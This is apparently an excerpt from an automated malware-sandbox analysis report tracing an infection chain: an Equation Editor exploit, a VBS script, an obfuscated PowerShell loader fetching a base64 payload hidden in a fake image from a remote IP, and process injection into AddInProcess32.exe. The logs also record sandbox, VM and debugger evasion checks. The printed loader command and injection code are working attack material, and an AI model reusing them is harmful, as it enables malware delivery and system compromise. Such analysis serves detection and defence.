                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-303
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: powershell.exe, 00000006.00000002.518863919.000000000411B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.479098901.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.479192755.00000000024AD000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.479192755.0000000002425000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.485482053.00000000022B5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.485482053.000000000233E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.492812954.000000000249E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.492812954.0000000002415000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.504664614.000000000236D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.504664614.00000000022E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 240000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 23F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 590000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2280000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 630000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 1C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 23E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 590000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 1D0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 22B0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 650000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 250000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2100000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 5C0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 350000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2220000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 590000 memory reserve | memory write watch
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 597832Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9230Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 652Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2072Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exe TID: 252Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1928Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2072Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2072Thread sleep time: -597832s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2072Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1712Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3144Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3236Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3312Thread sleep time: -300000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3388Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3484Thread sleep time: -420000s >= -30000s
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 597832Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: AddInProcess32.exe, 0000000E.00000002.617260829.00000000022DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                  Source: AddInProcess32.exe, 0000000B.00000002.492705422.0000000000922000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\scsi#disk&ven_vmware
                  Source: AddInProcess32.exe, 0000000E.00000002.617260829.00000000022DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: AddInProcess32.exe, 00000008.00000002.479098901.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                  Source: AddInProcess32.exe, 0000000E.00000002.616770593.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBox
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00245310 CheckRemoteDebuggerPresent,8_2_00245310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_034A058C mov edx, dword ptr fs:[00000030h]2_2_034A058C
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 91.92.254.14 80Jump to behavior
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1904, type: MEMORYSTR
                  Source: 6.2.powershell.exe.2b86934.1.raw.unpack, RunPEE.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref *(string*)(&name)), ref *(string*)(&method)), typeof(CreateApi)))
                  Source: 6.2.powershell.exe.2b86934.1.raw.unpack, RunPEE.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref *(string*)(&name)), ref *(string*)(&method)), typeof(CreateApi)))
                  Source: 6.2.powershell.exe.2b86934.1.raw.unpack, RunPEE.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num7 + num14, array2, array2.Length, ref bytesWritten)
                  Source: 6.2.powershell.exe.2b86934.1.raw.unpack, RunPEE.csReference to suspicious API methods: lIuveTP8wwjVYKV1XP(VirtualAllocEx, processInformation.ProcessHandle, 0, length, 12288, 64)
                  Source: 6.2.powershell.exe.2b86934.1.raw.unpack, RunPEE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num15 + 8, ref buffer, 4, ref bytesWritten)
                  Source: 6.2.powershell.exe.41bb700.2.raw.unpack, Ljq6xD21ACX.csReference to suspicious API methods: OZkujShDCVG.OpenProcess(aPNZ30.DuplicateHandle, bInheritHandle: true, (uint)snUp2.ProcessID)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll) Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
